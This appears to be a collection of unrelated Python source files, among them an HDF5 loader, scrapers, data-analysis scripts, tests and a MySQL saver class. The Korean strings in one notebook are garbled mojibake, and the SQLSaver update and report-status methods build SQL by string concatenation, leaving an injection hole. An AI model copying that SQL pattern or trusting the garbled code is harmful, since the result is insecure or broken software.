                    dset.attrs.create('system', 'unknown', (1,), dtype=dt)
                except Exception:
                    print('Error for key', inner_key)
                    print(type(mydata))
                    if type(mydata) is list:
                        print('type(mydata[0])')
                        print(type(mydata[0]))
                        print('mydata')
                        print(mydata)
            elif hasattr(mydata, 'dtype') and mydata.dtype == np.dtype('O'):
                # Object arrays: scalars and 1-D go through add_dataset;
                # 2-D is stored element-wise under suffixed keys.
                if mydata.shape == ():
                    add_dataset(group, inner_key, mydata, 'unknown')
                elif len(mydata.shape) == 1:
                    try:
                        add_dataset(group, inner_key, mydata, 'unknown')
                    except Exception as e:
                        print(e)
                        print('Error for key', inner_key)
                        print(group, inner_key)
                else:
                    for i in range(mydata.shape[0]):
                        for j in range(mydata.shape[1]):
                            try:
                                add_dataset(group, inner_key+'_%i_%i' % (i,j), mydata[i,j], 'unknown')
                            except Exception:
                                print('Error for key', inner_key)
                                print(group, inner_key, i, j)
            else:
                try:
                    add_dataset(group, inner_key, mydata, 'unknown')
                except Exception as e:
                    print('Error', e)
                    print(inner_key, type(mydata))

    with h5py.File(h5_filename, 'w') as dataH5:
        for main_key, subdict in data_dict.items():
            recurse_save(dataH5, subdict, main_key, None)
def loadH5Recursive(h5_file):
    """Load an HDF5 file into a nested dict, mirroring the group hierarchy.

    Inverse of the save routine above: a file saved under a single 'none'
    root group is unwrapped transparently. Datasets are converted to native
    Python scalars where size-1, numpy arrays otherwise, and byte strings
    are decoded to str. Unconvertible entries are reported and skipped.
    """
    def recurse_load(group_or_val, key, saved_dict_curr):
        type_ = type(group_or_val)
        # Probe whether the node supports scalar access; some h5py objects
        # (groups) raise here, which is the signal we want.
        try:
            group_or_val[()]
        except:
            hasval = False
        else:
            hasval = True
        if type_ is h5py._hl.files.File:
            # File root: recurse into children without creating a dict level.
            for new_key, new_group_or_val in group_or_val.items():
                recurse_load(new_group_or_val, new_key, saved_dict_curr)
        elif type_ is h5py._hl.group.Group:
            # Group: becomes a nested dict keyed by its member names.
            saved_dict_curr[key] = new_dict = {}
            for new_key, new_group_or_val in group_or_val.items():
                recurse_load(new_group_or_val, new_key, new_dict)
        elif type_ == np.dtype('O') and hasval and type(group_or_val[()]) is bytes:
            # Object-dtype scalar holding bytes -> decode to str.
            saved_dict_curr[key] = group_or_val[()].decode()
        elif type_ == h5py._hl.dataset.Dataset:
            dtype = group_or_val.dtype
            #if not hasattr(group_or_val, 'value'):
            #    print('Could not store key %s with type %s in dict' % (key, dtype))
            #    return
            if dtype in (np.dtype('int64'), np.dtype('int32'), np.dtype('int16'), np.dtype('int8'), np.dtype('uint32'), np.dtype('uint16'), np.dtype('uint8'), np.dtype('uint64')):
                # Integer dataset: squeeze; collapse size-1 arrays to int.
                saved_dict_curr[key] = np.array(group_or_val[()], dtype).squeeze()
                if saved_dict_curr[key].size == 1:
                    saved_dict_curr[key] = int(saved_dict_curr[key])
            elif dtype == np.dtype('bool'):
                try:
                    saved_dict_curr[key] = bool(group_or_val[()])
                except Exception as e:
                    print(e)
                    print('Could not store key %s with type %s in dict (1)' % (key, dtype))
            elif dtype in (np.dtype('float64'), np.dtype('float32')):
                # Float dataset: squeeze; collapse size-1 arrays to float.
                saved_dict_curr[key] = np.array(group_or_val[()]).squeeze()
                if saved_dict_curr[key].size == 1:
                    saved_dict_curr[key] = float(saved_dict_curr[key])
            elif dtype.str.startswith('|S'):
                # Fixed-length byte strings: decode, handling the shapes the
                # saver produces ((1,1), (1,), scalar, or N-d).
                if group_or_val[()].shape == (1,1):
                    saved_dict_curr[key] = group_or_val[()][0,0].decode()
                elif group_or_val[()].shape == (1,):
                    saved_dict_curr[key] = group_or_val[()][0].decode()
                elif group_or_val[()].shape == ():
                    saved_dict_curr[key] = group_or_val[()].decode()
                else:
                    saved_dict_curr[key] = [x.decode() for x in group_or_val[()].squeeze()]
            elif dtype.str == '|O':
                # Opaque object dataset: store as-is.
                saved_dict_curr[key] = group_or_val[()]
            elif type(group_or_val[()]) is str:
                saved_dict_curr[key] = group_or_val[()]
            else:
                print('Could not store key %s with type %s in dict (2)' % (key, dtype))
        else:
            print('Could not store key %s with type %s in dict (3)' % (key, type_))
    saved_dict = {}
    with h5py.File(h5_file.strip(), 'r') as f:
        # Files written by the saver above wrap everything in a 'none' group;
        # unwrap it so callers get the original top-level dict back.
        if 'none' in f:
            recurse_load(f['none'], 'key', saved_dict)
            saved_dict = saved_dict['key']
        else:
            recurse_load(f, 'key', saved_dict)
    return saved_dict
|
409 | 4d388c912915c3f1f9e433f1342289f0864b3a11 | #!/usr/bin/python
# File: UdpClient.py
# Author: David Zemon
# Project: Project1
#
# Created with: PyCharm Community Edition
"""
@description:
"""
__author__ = 'david'
import logging
from src.UDP import UDPClient
# Simple UDP echo client: send one line of user input to the local server
# and print whatever comes back.
logging.basicConfig(level="DEBUG")
serverName = '127.0.0.1'
serverPort = 12000
client = UDPClient()
message = input("Input lowercase sentence: ")
client.sendto(message.encode('utf-8'), (serverName, serverPort))
# Block until the server responds (receive buffer: 2048 bytes).
modifiedMessage, serverAddress = client.recvfrom(2048)
print(modifiedMessage.decode('utf-8'))
client.close()
|
410 | cd5945631a9dd505bf67089bab8c5a37ad375129 | import pandas as pd
# Concatenate two tab-separated files into a single TSV.
# Pass `sep` by keyword: positional use of read_csv arguments after the
# path is deprecated and removed in modern pandas.
df1 = pd.read_csv("../final/your_no.tsv", sep='\t')
df2 = pd.read_csv("../../Downloads/me.csv", sep='\t')
final = pd.concat([df1, df2])
final.to_csv('../../Downloads/final_con_final.tsv', sep='\t', index=False)
|
411 | 16b425d7b8cde1aabe038ccae6922091afb84415 |
# coding: utf-8
# In[1]:
import matplotlib.pyplot as plt
import matplotlib
import pandas as pd
import numpy as np
from pandas import DataFrame, Series
import os, re
# In[2]:
OUTPUT_EXCEL = '์๋ณ์๋ด์ฝํ์ฌ์ฉํํฉ.xlsx'
# In[3]:
# ๋ฐ์ดํ์
์ค๋น
data_source_dir = '์ฌ์ฉ๋์๋ณํต๊ณ/์๋ด'
dfs = []
for fname in os.listdir(data_source_dir):
fn, ext = os.path.splitext(fname)
if ext in ['.xls', '.xlsx']:
df = pd.read_excel(os.path.join(data_source_dir, fname))
df['์ฌ์ฉ(๊ฐ์)๋
์'] = fn
dfs.append(df)
use_amount_df = pd.concat(dfs, ignore_index=True)
# In[4]:
drug_standard_df = pd.read_json('drug.json').T
drug_info_df = pd.read_excel('์ฝํ์ ๋ณด.xls')
use_amount_df = pd.merge(drug_info_df, use_amount_df[['์ฌ์ฉ๋', '์ฝํ์ฝ๋', '์ฌ์ฉ(๊ฐ์)๋
์']], on='์ฝํ์ฝ๋', how='left')
use_amount_df = pd.merge(use_amount_df, drug_standard_df[['๋ณดํ์ฝ๋', '์ ํ๋ช
', 'ํ๋งค์ฌ', '์ฑ๋ถ/ํจ๋']], left_on='EDI์ฝ๋', right_on='๋ณดํ์ฝ๋', how='left')
use_amount_df['์ ํ๋ช
'] = use_amount_df['์ ํ๋ช
'].fillna(use_amount_df['์ฝํ๋ช
(ํ๊ธ)'])
use_amount_df['์ฌ์ฉ๊ฐ์๋
์'] = use_amount_df['์๊ฐ์์์ผ์'].map(lambda x: str(x)[0:4]+'-'+str(x)[4:6])
use_amount_df['์ฌ์ฉ(๊ฐ์)๋
์'] = use_amount_df['์ฌ์ฉ(๊ฐ์)๋
์'].fillna(use_amount_df['์ฌ์ฉ๊ฐ์๋
์'])
use_amount_df['์ฑ๋ถ๋ช
'] = use_amount_df['์ฑ๋ถ๋ช
'].fillna(use_amount_df['์ฑ๋ถ/ํจ๋'])
use_amount_df['์๋ด/์์ธ ์ฒ๋ฐฉ๊ตฌ๋ถ'] = use_amount_df['์๋ด/์์ธ ์ฒ๋ฐฉ๊ตฌ๋ถ'].map({1: '์์ธ', 2: '์์ธ/์๋ด', 3: '์๋ด'})
use_amount_df['์ฝํ๋ฒ์ ๊ตฌ๋ถ'] = use_amount_df['์ฝํ๋ฒ์ ๊ตฌ๋ถ'].map({0: '์ผ๋ฐ', 1: '๋ง์ฝ', 2: 'ํฅ์ ์ฝ', 3: '๋
์ฝ', 4: 'ํ๋ฐฉ์ฝ', 5: '๊ณ ๊ฐ์ฝ'})
# In[5]:
def get_last(s):
    """Return max(s); fall back to returning *s* itself when it is not a
    non-empty iterable (scalar month value, or an empty sequence)."""
    try:
        return max(s)
    except (TypeError, ValueError):
        # TypeError: s is not iterable / not comparable;
        # ValueError: s is an empty sequence.
        # (The original used a bare except, which also swallowed
        # KeyboardInterrupt and the like.)
        return s
# In[6]:
months = use_amount_df['์ฌ์ฉ(๊ฐ์)๋
์'].unique()
months = sorted(months.tolist(), reverse=1)
use_amount_df['์ตํ์ฌ์ฉ์'] = use_amount_df.groupby(['์ ํ๋ช
'])['์ฌ์ฉ(๊ฐ์)๋
์'].transform(get_last)
use_amount_df['์ต๊ทผ๋ฏธ์ฌ์ฉ์์'] = use_amount_df['์ตํ์ฌ์ฉ์'].map(lambda x: months.index(x) if x in months else -1)
# In[7]:
use_amount_in_df = use_amount_df[use_amount_df['์๋ด/์์ธ ์ฒ๋ฐฉ๊ตฌ๋ถ'] != '์์ธ']
# In[8]:
use_amount_in_df['์ฌ์ฉ๋'] = use_amount_in_df['์ฌ์ฉ๋'].fillna('์คํํ๋ฏธ์ฌ์ฉ')
# In[9]:
pat = '(\(([^\d].*?)\)+\s*)|ํด์ฅ๋ฐฉ์ง\s*|์์ฐ์๊ฐ๋ณด์ ,*\s*|์ฌ์ฉ์ฅ๋ ค(๋น\s*\d+์|๋ฐ|๋น์ฉ์ง๊ธ,*\s*)'
use_amount_in_df = use_amount_in_df.rename(columns={'์ ํ๋ช
': '์ฝํ๋ช
(๋๋ญ์ธํฌ)', '์ฝํ๋ช
(ํ๊ธ)': '์ฝํ๋ช
(์๋ด)'})
use_amount_in_df['์ฝํ๋ช
(๋๋ญ์ธํฌ)'] = use_amount_in_df['์ฝํ๋ช
(๋๋ญ์ธํฌ)'].str.replace(pat, '')
# In[10]:
pvt = use_amount_in_df.pivot_table(index = ['EDI์ฝ๋','์ฝํ๋ช
(๋๋ญ์ธํฌ)', '์ฑ๋ถ๋ช
','์ฝํ์ฝ๋','์ฝํ๋ช
(์๋ด)','ํจ๋ฅ์ฝ๋๋ช
','๊ท๊ฒฉ๋จ์', '์ต๊ทผ๋ฏธ์ฌ์ฉ์์'], columns=['์ฌ์ฉ(๊ฐ์)๋
์'], values=['์ฌ์ฉ๋'], aggfunc=sum)
# In[11]:
pvt.to_excel(OUTPUT_EXCEL)
os.startfile(OUTPUT_EXCEL)
# In[ ]:
|
412 | 0eaaa81d3c8bc61368701e1916b42ede88b90d04 | # EXERCISE:
# Plotting distributions pairwise (2)
# In this exercise, you will generate pairwise joint distributions again. This time, you will make two particular
# additions:
# - You will display regressions as well as scatter plots in the off-diagonal subplots. You will do this with the
# argument kind='reg' (where 'reg' means 'regression'). Another option for kind is 'scatter' (the default) that
# plots scatter plots in the off-diagonal subplots.
# - You will also visualize the joint distributions separated by continent of origin. You will do this with the
# keyword argument hue specifying the 'origin'.
# INSTRUCTIONS:
# - Plot the pairwise joint distributions separated by continent of origin and display the regressions.
# CODE:
# Print the first 5 rows of the DataFrame
# NOTE(review): assumes `auto` (a DataFrame), `sns` (seaborn) and `plt`
# (matplotlib.pyplot) are provided by the exercise environment — confirm.
print(auto.head())
# Plot the pairwise joint distributions grouped by 'origin' along with regression lines
sns.pairplot(auto, kind='reg', hue='origin')
# Display the plot
plt.show()
|
413 | 27e9635adf6109f3ab13b9d8dd5809973b61ca03 | #Web Scraping
# Make sure you have bs4, requests (and lxml) installed as third-party modules.
import bs4, webbrowser, requests

try:
    data = requests.get("http://en.wikipedia.org/wiki/Python")
    # Raise for 4xx/5xx so the outer handler reports the failure.
    data.raise_for_status()
    my_data = bs4.BeautifulSoup(data.text, "lxml")
    # The loop below lists anchor tags; the original banner wrongly said
    # "header tags".
    print("List of all the link targets (href attributes): \n\n")
    for the_data in my_data.find_all("a"):
        try:
            print(the_data.attrs["href"])
        except KeyError as err:
            # Anchor tags without an href attribute land here.
            print(err)
except Exception as err:
    print(err)
    print("\nNo website matches your search.")
|
414 | f5f26819be4b98fab3d46e57e1a5431e54342aed |
# coding: utf-8
"""Supporting model logic for predicting emotional content of user input.
"""
import pandas as pd
import gensim
from sklearn.model_selection import train_test_split
from sklearn.multiclass import OneVsRestClassifier
from sklearn.svm import LinearSVC
#load data for emo2vec
loc = 'https://s3-us-west-1.amazonaws.com/victorsdatasets/NRCEmotionLexiconv092AnnotatorandSenseLevel.txt'
print("loading & cleaning the data...")
em_words = pd.read_csv(loc, sep='\t', names=['annotator_id',
'remove',
'word',
'joy',
'sadness',
'fear',
'anger',
'trust',
'disgust',
'surprise',
'anticipation',
'POS'])
em_words.drop('remove', axis=1, inplace=True)
em_words['word'], em_words['synonym'] = em_words['word'].str.split('--').str
em_words['toss1'], em_words['joy'] = em_words['joy'].str.split('-').str
em_words['toss2'], em_words['sadness'] = em_words['sadness'].str.split('-').str
em_words['toss3'], em_words['fear'] = em_words['fear'].str.split('-').str
em_words['toss4'], em_words['anger'] = em_words['anger'].str.split('-').str
em_words['toss5'], em_words['trust'] = em_words['trust'].str.split('-').str
em_words['toss6'], em_words['disgust'] = em_words['disgust'].str.split('-').str
em_words['toss7'], em_words['surprise'] = em_words['surprise'].str.split('-').str
em_words['toss8'], em_words['anticipation'] = em_words['anticipation'].str.split('-').str
em_words['toss9'], em_words['POS'] = em_words['POS'].str.split('-').str
em_words.drop(['toss1','toss2','toss3','toss4','toss5','toss6','toss7','toss8','toss9'],
axis=1,
inplace=True)
new_cols = ['annotator_id',
'word','synonym',
'joy',
'sadness',
'fear',
'anger',
'trust',
'disgust',
'surprise',
'anticipation',
'POS']
em_words = em_words.reindex_axis(new_cols, axis=1)
emotions = em_words[['joy',
'sadness',
'fear',
'anger',
'trust',
'disgust',
'surprise',
'anticipation']]
em_words[emotions.columns] = em_words[emotions.columns].apply(pd.to_numeric)
affected = em_words[emotions.columns].groupby([em_words['word']], sort=False).mean().reset_index()
# Load Google's pre-trained Word2Vec model.
print('training the word2vec model from google\'s corpus')
model = gensim.models.Word2Vec.load_word2vec_format('../GoogleNews-vectors-negative300.bin', binary=True)
# create list of word indicies to drop to avoid keyerrors with Google's pre-trained model.
idx_to_drop = []
def dropper():
    """Append to the module-level idx_to_drop list the DataFrame index of
    every word in `affected` that is absent from the word2vec model's
    vocabulary, so those rows can be dropped before vector lookup."""
    for ex in affected['word']:
        if ex not in model.vocab:
            idx_to_drop.append(affected.loc[affected.word == ex].index[0])
# drop words from affected that are not in google's model
dropper()
affected = affected.drop(idx_to_drop, axis=0)
G_vectors = lambda x: model[x]
affected['word_vectors'] = affected['word'].apply(G_vectors)
affected['label_vectors'] = affected[emotions.columns].values.tolist()
affected['binary'] = (affected[emotions.columns] > 0).astype(int).values.tolist()
df1 = affected[emotions.columns].rank(method='max', axis=1).rank(method='first', axis=1)
ma = df1.max().max()
affected['label'] = (df1== ma).astype(int).values.tolist()
affected['target'] = affected['label'].apply(lambda x: x.index(1))
label_dict = {0 : 'joy',
1 : 'sadness',
2 : 'fear',
3 : 'anger',
4 : 'trust',
5 : 'disgust',
6 : 'surprise',
7 : 'anticipation'}
affected['label_name'] = affected['target'].apply(lambda x: label_dict[x])
emo2vec = affected[['word_vectors', 'label_vectors', 'binary', 'label', 'target', 'label_name']]
# # Model Testing
print("splitting into train/test groups...")
emo_X, emo_y = list(emo2vec.word_vectors), list(emo2vec.target)
emo_X_train, emo_X_test, emo_y_train, emo_y_test = train_test_split(emo_X, emo_y, random_state=42)
# ### OnevsRest with LinearSVC (best score)
print("creating a model with the best stuff we've got...")
OVR = OneVsRestClassifier(LinearSVC(random_state=0), n_jobs=-1)
emo_model = OVR.fit(emo_X_train, emo_y_train)
|
415 | d2e46944ab05c5e8c1979101728b7b25900be342 | import pytest
from time import sleep
from timeflux.helpers.background import Task
class DummyWorker():
    """Trivial worker used by the background-Task tests."""

    def echo(self, message='hello', delay=0, fail=False):
        """Sleep *delay* seconds, then store *message* on the instance and
        return it. Raises Exception('failed') when *fail* is true."""
        sleep(delay)
        if fail:
            raise Exception('failed')
        self.message = message
        return self.message
def test_default(working_path):
    """Echo with defaults: result is 'hello' and is recorded on the worker."""
    task = Task(DummyWorker(), 'echo').start()
    # Poll until the background task reports completion.
    while not task.done:
        status = task.status()
    assert status['result'] == 'hello'
    assert status['instance'].message == 'hello'
def test_args(working_path):
    """Positional arguments are forwarded to the worker method."""
    task = Task(DummyWorker(), 'echo', 'foobar').start()
    while not task.done:
        status = task.status()
    assert status['result'] == 'foobar'
def test_kwargs(working_path):
    """Keyword arguments are forwarded to the worker method."""
    task = Task(DummyWorker(), 'echo', message='foobar').start()
    while not task.done:
        status = task.status()
    assert status['result'] == 'foobar'
def test_exception(working_path):
    """A raising worker surfaces success=False and the original exception."""
    task = Task(DummyWorker(), 'echo', fail=True).start()
    while not task.done:
        status = task.status()
    assert status['success'] == False
    assert status['exception'].args[0] == 'failed'
def test_stop_running(working_path):
    """Stopping a still-running task marks it done."""
    task = Task(DummyWorker(), 'echo', delay=5).start()
    # Give the task time to start but not finish (it sleeps 5 s).
    sleep(.5)
    assert task.done == False
    task.stop()
    assert task.done == True
def test_stop_not_running(working_path):
    """Stopping an already-finished task is a no-op; it stays done."""
    task = Task(DummyWorker(), 'echo').start()
    while not task.done:
        status = task.status()
    task.stop()
    assert task.done == True
|
416 | b2f2f1e4b7070ac867b71e538f759e527eb1ffb9 | from pymouse import PyMouse
m = PyMouse()
w,h = m.screen_size()
class base_controller:
    """Mouse controller that maps normalized [0, 1] coordinates to the
    module-level screen size (w, h) and drives the PyMouse instance m."""
    def __init__(self):
        pass
    def move(self,xy:list):
        '''
        Move the pointer to normalized position xy = [x, y].
        '''
        m.move(xy[0]*w,xy[1]*h)
    def click(self, xy:list):
        '''
        Click at normalized position xy = [x, y].
        '''
        m.click(xy[0]*w,xy[1]*h)
    def scroll(self, marks:list):
        '''
        Scroll based on the vertical travel between the first and last
        tracked point; |d| must exceed the threshold R to trigger.
        '''
        d = marks[0][1] - marks[-1][1]
        R = 0.2
        print(d)
        if d > R:
            m.scroll(-1)
        elif d < -R:
            m.scroll(1)
    def press(self, xy:list, ones = True):
        '''
        Long press: initial press when `ones` is true, otherwise drag to
        follow subsequent positions.
        '''
        if ones:
            m.press(xy[0]*w,xy[1]*h)
        else:
            m.drag(xy[0]*w,xy[1]*h)
    def release(self, xy:list):
        '''
        Release the button at normalized position xy = [x, y].
        '''
        m.release(xy[0]*w,xy[1]*h)
class mac_controller(base_controller):
    """macOS variant of the controller; currently adds no behavior beyond
    base_controller."""
    def __init__(self):
        super(mac_controller, self).__init__()
|
417 | ec9efeca7eef7b8ee25c1e089e675bdb1e53413b | # -*- coding:utf-8 -*-
# Author: washing
# DateTime: 2022/5/18 10:28
# File: 0668.py
# Desc: CV
class Solution:
def findKthNumber(self, m: int, n: int, k: int) -> int:
return bisect_left(range(m * n), k, key=lambda x: x // n * n + sum(x // i for i in range(x // n + 1, m + 1)))
|
418 | 13342922022f0a0e8928c81c1c4716125af0b2c4 | import matplotlib.pyplot as plt
import numpy as np
plt.rcParams['savefig.dpi'] = 300 #ๅพ็ๅ็ด
plt.rcParams['figure.dpi'] = 300 #ๅ่พจ็
plt.rcParams['font.sans-serif']=['SimHei']
plt.rcParams['axes.unicode_minus'] = False
x_axis = [20,40,60,80,100]
rf = [184,174,166,159,157.5]
anns = [186,179,170,164,161]
adaboost = [187.5,176,172,163,162]
x = np.arange(len(x_axis)) # use the length of the first series as the x positions
width = 0.2 # gap width between adjacent bars
fig,ax = plt.subplots()
p_rf = ax.bar(x-width,rf,width,alpha = 0.9,)
p_anns = ax.bar(x,anns,width,alpha = 0.9,color= 'red')
p_adaboost = ax.bar(x+width,adaboost,width,alpha = 0.9,color= 'green')
ax.set_xticks(x +width/2)#ๅฐๅๆ ่ฎพ็ฝฎๅจๆๅฎไฝ็ฝฎ
ax.set_xticklabels(x_axis)#ๅฐๆจชๅๆ ๆฟๆขๆ
plt.legend((p_rf[0],p_anns[0],p_adaboost[0]),('RF','ANNs','AdaBoost'),loc='best',fontsize=20)
plt.xticks(fontsize=18)
plt.yticks(fontsize=18)
plt.ylim(150,200) # ๆๅฎY่ฝด็้ซๅบฆ
plt.xlabel('่ฎญ็ป้ๅคงๅฐ(%)',fontsize=20)
plt.ylabel('MAE(s)',fontsize=20)
plt.show()
#plt.savefig('MAE.png', dpi=3600) |
419 | cb08b95e3b9c80fb74d4415b3798ddbb36cd76e7 | import unittest
"""
Find the largest 0 to 9 pandigital that can be formed by concatenating products
Take the number 6 and multiply it by each of 1273 and 9854:
6 ร 1273 = 7638
6 ร 9854 = 59124
By concatenating these products we get the 1 to 9 pandigital 763859124. We will call 763859124 the "concatenated product of 6 and (1273,9854)". Notice too, that the concatenation of the input numbers, 612739854, is also 1 to 9 pandigital.
The same can be done for 0 to 9 pandigital numbers.
What is the largest 0 to 9 pandigital 10-digit concatenated product of an integer with two or more other integers, such that the concatenation of the input numbers is also a 0 to 9 pandigital 10-digit number?
"""
class Test(unittest.TestCase):
    def test(self):
        # Placeholder: the pandigital concatenated-product solution is not
        # implemented yet; keep the suite green.
        pass
|
420 | 63a40282f16a7f27c118594f1a9468749682594f | import requests
import os
from jpmesh import parse_mesh_code
from tqdm import tqdm
url_login='https://platform.openquake.org/account/login/'
client = requests.session()
client.get(url_login)
# Identification for openquake platform
login_data = {'username':'###','password':'###'}
r1=client.post(url_login,data=login_data)
def scrap_expo():
    """Download OpenQuake exposure CSVs for every mesh under 'Site Effects/'.

    For each mesh code (taken from the directory-name suffix) and for both
    occupancy filters, streams the platform's CSV export into
    'Exposure/<occupancy>/<mesh code>.csv'. Relies on the module-level
    authenticated `client` session.
    """
    dir_names=os.listdir('Site Effects/')
    for name in dir_names:
        # Mesh code is the part after the last '-' in the directory name.
        fcode = name.split('-')[-1]
        mesh = parse_mesh_code(fcode)
        sw = mesh.south_west
        ne = sw+ mesh.size
        # Bounding box: (lng1, lat2) is the south-west corner,
        # (lng2, lat1) the north-east corner.
        lng1 = str(sw.lon.degree)
        lng2 = str(ne.lon.degree)
        lat1 = str(ne.lat.degree)
        lat2 = str(sw.lat.degree)
        for occ in ['residential', 'non-residential']:
            url_add_run='http://platform.openquake.org/exposure/export_exposure?output_type=csv&sr_id=113&occupancy_filter='+occ+'&lng1='+lng1+'&lat1='+lat1+'&lng2='+lng2+'&lat2='+lat2
            output = open('Exposure/'+occ+'/'+fcode+'.csv', 'wb')
            print(fcode)
            r2=client.get(url_add_run, stream=True)
            # Stream the response body to disk with a progress bar.
            for data in tqdm(r2.iter_content()):
                output.write(data)
            output.close()
            print(r2.status_code)
def scrap_consequences():
    """Download the ECD consequences-overview page for one earthquake event
    and save the raw response to 'Consequences/<eq_code>.txt'.

    Uses the module-level authenticated `client` session. The original used
    Python-2 print statements (a SyntaxError under Python 3, and
    inconsistent with scrap_expo above) and then called .split('') on the
    list returned by readlines(), which can never work; both are fixed.
    """
    eq_code = str(134)
    url_add_run = 'https://platform.openquake.org/ecd/eventoverview/' + eq_code + '?&zoomtoextent=True&f_b=False&f_c=False&f_i=False&f_p=False&f_s=False&all=True'
    file_name = 'Consequences/' + eq_code + '.txt'
    output = open(file_name, 'wb')
    print(client)
    r2 = client.get(url_add_run, stream=True)
    print(r2.status_code)
    # Stream the response body to disk with a progress bar.
    for data in tqdm(r2.iter_content()):
        print(data)
        output.write(data)
    output.close()
    # Re-read what was written and show it line by line for inspection.
    with open(file_name) as f:
        data = f.readlines()
    print(data)
# scrap_consequences() |
421 | e695b9458c0e98521e560dbb291f6f05bda1549f | from savers.saver import SaverInterface
import os
from config import SaverConfig
import mysql.connector
import json
import logging
class SQLSaver(SaverInterface):
    # This class takes in json files and will interpret the jsons as follows.
    # {'tablename':[{'columnname01':'somevalue','columnname02':'somevalue'},{'columnaname02':'somevalue'}]}
    def connect(self):
        # Open the MySQL connection using credentials from self.config.
        self.logging.info("Logging to %s@%s:%s -p %s", self.config.SQL_USER, self.config.SQL_HOST, self.config.SQL_DATABASE, self.config.SQL_PASSWD)
        self.db = mysql.connector.connect(host=self.config.SQL_HOST, user=self.config.SQL_USER, passwd=self.config.SQL_PASSWD, database=self.config.SQL_DATABASE, auth_plugin='mysql_native_password')
        self.logging.info("Log in is successful")
    # NOTE(review): this one-argument executesql is shadowed by the
    # two-argument executesql defined further down (same name; the later
    # definition wins at class-creation time), so it is unreachable.
    def executesql(self, sqlstatement):
        self.logging.debug("Executing %s", sqlstatement)
        cursor=self.db.cursor()
        cursor.execute(sqlstatement)
        self.db.commit()
        rowcount=cursor.rowcount
        cursor.close()
        return rowcount
    def executesqlupdate(self,sqlstatement):
        # Execute a single statement, logging (but swallowing) any error.
        # Returns None in all cases.
        try:
            self.logging.debug("Executing %s ", sqlstatement)
            cursor=self.db.cursor()
            cursor.execute(sqlstatement)
            self.db.commit()
            rowcount=cursor.rowcount
            cursor.close()
        except Exception as e:
            self.logging.error("Problem executing SQL: %s", str(e))
    def executesql(self, sqlstatement, data):
        # Execute a parameterized statement; returns the affected row count,
        # or 0 on error.
        try:
            self.logging.debug("Executing %s with data as follows %s", sqlstatement, data)
            cursor=self.db.cursor()
            cursor.execute(sqlstatement, data)
            self.db.commit()
            rowcount=cursor.rowcount
            cursor.close()
        except Exception as e:
            self.logging.error("Problem executing SQL: %s", str(e))
            rowcount=0
        return rowcount
    def querysql(self,sqlstatement):
        # Run a query and return all fetched rows.
        print("Statements to execute\n",sqlstatement)
        cursor=self.db.cursor()
        cursor.execute(sqlstatement)
        records = cursor.fetchall()
        cursor.close()
        return records
    def __init__(self,config=None):
        # NOTE(review): when a config object IS passed, self.config is never
        # assigned (there is no else branch), so connect() below fails with
        # AttributeError in that case.
        if config == None:
            self.config = SaverConfig()
        logging.basicConfig(level=logging.DEBUG,handlers=[
            logging.FileHandler("{0}/{1}.log".format("/logs", "saverservice-sqlsaver")),
            logging.StreamHandler()
            ],
            format="%(asctime)-15s %(levelname)-8s %(message)s")
        self.logging=logging
        self.connect()
    def freequery(self, sqlstring):
        # Run an arbitrary caller-supplied query and return the rows.
        records=self.querysql(sqlstring)
        return records
    def create(self, jsonobject):
        # Insert rows described as {'table': [{col: val, ...}, ...]} using
        # parameterized INSERT statements. Returns the total affected row
        # count, or 0 if anything raised.
        try:
            self.logging.info("Starting create operations")
            if isinstance(jsonobject, str):
                self.logging.debug("data obj received is not json, manually converting")
                jsonobject = json.loads(jsonobject)
            dictkeys= jsonobject.keys()
            totalrowcount=0
            for tablename in dictkeys:
                rowstoadd=jsonobject[tablename]
                self.logging.debug("Table: %s Rows: %s",tablename, rowstoadd)
                sqlstatementcolnames=""
                sqlstatementcolvalues=""
                for row in rowstoadd:
                    print("Row:{}".format(row))
                    dictcolsinrow=row.keys()
                    print("ColumnNames: {}".format(dictcolsinrow))
                    colCount=0
                    datalist=[]
                    for col in dictcolsinrow:
                        self.logging.debug("Col:%s,Val:%s",col,row[col])
                        if colCount==0:
                            sqlstatementcolnames=col
                            #sqlstatementcolvalues="\'"+str(row[col])+"\'"
                            sqlstatementcolvalues="%s"
                            datalist.append(str(row[col]))
                        else:
                            sqlstatementcolnames=sqlstatementcolnames+','+col
                            #sqlstatementcolvalues=sqlstatementcolvalues+','+"\'"+str(row[col])+"\'"
                            sqlstatementcolvalues=sqlstatementcolvalues+",%s"
                            datalist.append(str(row[col]))
                        colCount=colCount+1
                    sqlstatement="INSERT INTO " + tablename + "(" + sqlstatementcolnames + ") VALUES (" + sqlstatementcolvalues + ")"
                    rowcount=self.executesql(sqlstatement, datalist)
                    totalrowcount=totalrowcount+rowcount
        except Exception as e:
            totalrowcount=0
        return totalrowcount
    def update(self,jsonobject):
        #Expects the following json
        #{"tablename":[
        #{"row":
        #{"data":{"columnname02":"01value","columnname02":"02value"},"condition":{"columnname03":"03value"}}},
        #{"row":
        #{"data":{"columnname04":"04value","columnname05":"05value"},"condition":{"columnname06":"06value"}}}
        #]}
        dictkeys= (jsonobject.keys())
        print("Dict keys:",dictkeys)
        sqlstatements=[]
        for tablename in dictkeys:
            rowstoupdate=jsonobject[tablename]
            print("Table: {}\nRows:{}".format(tablename,rowstoupdate))
            for rowtoupdate in rowstoupdate:
                rowdata=rowtoupdate['row']['data']
                rowcondition=rowtoupdate['row']['condition']
                print("ROW:\n\tRowData:{}\n\tRowCondition:{}".format(rowdata,rowcondition))
                sqlstatementdata=""
                colCount=0
                for colname in rowdata.keys():
                    if colCount==0:
                        sqlstatementdata = colname+"="+"\'"+str(rowdata[colname])+"\'"
                    else:
                        sqlstatementdata = sqlstatementdata+","+colname+"="+"\'"+str(rowdata[colname])+"\'"
                    colCount=colCount+1
                sqlstatementcondition=""
                colCount=0
                for colname in rowcondition.keys():
                    if colCount==0:
                        sqlstatementcondition=colname+"="+"\'"+str(rowcondition[colname])+"\'"
                    else:
                        sqlstatementcondition=sqlstatementcondition+" AND "+ colname+"="+"\'"+str(rowcondition[colname])+"\'"
                    colCount=colCount+1
                sqlstatement="UPDATE " + tablename + " SET " + sqlstatementdata + " WHERE " + sqlstatementcondition
                sqlstatements.append(sqlstatement)
        # NOTE(review): builds SQL by string concatenation (injection risk,
        # unlike create() which parameterizes) and then calls the
        # two-argument executesql with a single list argument, which raises
        # TypeError. Probably intended executesqlupdate per statement.
        self.executesql(sqlstatements)
    def setreportstatus(self,filename,status):
        # Mark a report's current location/status by filename.
        sqlstring="UPDATE reports SET currentloc='" + status.upper() + "' WHERE filename='" + filename.lower()+"'"
        self.executesqlupdate(sqlstring)
    def get(self):
